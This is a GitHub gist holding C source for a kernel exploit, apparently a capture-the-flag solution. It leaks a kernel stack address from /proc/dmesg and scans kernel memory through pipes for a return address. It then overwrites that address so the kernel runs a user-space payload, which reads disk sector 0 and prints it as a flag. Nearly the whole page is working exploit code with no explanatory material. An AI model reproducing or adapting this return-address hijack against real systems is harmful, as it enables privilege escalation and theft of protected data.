Created
December 29, 2019 21:39
-
-
Save Fire30/fc99a83a86467e24d067cab81a0db7fb to your computer and use it in GitHub Desktop.
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
#include <cstring> | |
#include <fcntl.h> | |
#include <stdio.h> | |
#include <stdlib.h> | |
#include <sys/cdefs.h> | |
#include <sys/mman.h> | |
#include <sys/uio.h> | |
#include <unistd.h> | |
unsigned long find_stackbase() | |
{ | |
FILE* fp; | |
char* line = NULL; | |
char* end = NULL; | |
size_t len = 0; | |
ssize_t read; | |
unsigned long val = 0; | |
fp = fopen("/proc/dmesg", "r"); | |
while ((read = getline(&line, &len, fp)) != -1) { | |
} | |
line = strstr(line, "@") + 2; | |
end = strstr(line, " "); | |
*end = 0; | |
fclose(fp); | |
//strtoul is broken so we chop off the highest nibble and add it back in after | |
val = strtoul(line + 3, NULL, 16); | |
val |= 0xC0000000; | |
return val; | |
} | |
unsigned long find_hijack(unsigned long stack_base) | |
{ | |
{ | |
int p[2]; | |
char buf[0x1000] = {}; | |
pipe(p); | |
unsigned long addr = stack_base; | |
for (int i = 0; i < 0x10000; i += 0x1000) { | |
int err = write(p[1], (void*)(addr + i), 0x1000); | |
if (err != -1) { | |
err = read(p[0], buf, 0x1000); | |
for (int j = 0; j < 0x1000 - 0x4; j += 4) { | |
uint32_t ret = *(uint32_t*)(buf + j); | |
if (ret == 0x001470c7) { | |
return addr + i + j; | |
} | |
} | |
} | |
} | |
return 0; | |
} | |
} | |
unsigned long sleep_child() | |
{ | |
sleep(5); | |
printf("we made it here\n"); | |
exit(0); | |
} | |
unsigned long muid; | |
void* shared; | |
void* (*get_device)(int, int) = (void* (*)(int, int))(0x118728); | |
void* (*device_read)(void*, unsigned int, unsigned int, void*) = (void* (*)(void*, unsigned int, unsigned int, void*))(0x118a46); | |
void payload() | |
{ | |
void* dev = get_device(3, 1); | |
device_read(dev, 0, 512, shared); | |
*(unsigned long*)0x41414141 = 0x31313131; | |
} | |
int main(int, char**) | |
{ | |
shared = mmap(NULL, 0x1000, PROT_READ | PROT_WRITE, MAP_ANON | MAP_SHARED, -1, 0); | |
if (fork() == 0) { | |
sleep_child(); | |
} | |
sleep(1); | |
unsigned long stackbase = find_stackbase(); | |
printf("stackbase at %lx\n", stackbase); | |
unsigned long hijack = find_hijack(stackbase); | |
printf("hijack at %lx\n", hijack); | |
int p[2]; | |
pipe(p); | |
unsigned long val = (unsigned long)&payload; | |
int err = write(p[1], &val, 4); | |
printf("err is %x\n", err); | |
err = read(p[0], (void*)hijack, 4); | |
printf("err is %x\n", err); | |
sleep(5); | |
printf("flag is %s\n", (char*)shared); | |
sleep(10); | |
return 1; | |
} |
Sign up for free
to join this conversation on GitHub.
Already have an account?
Sign in to comment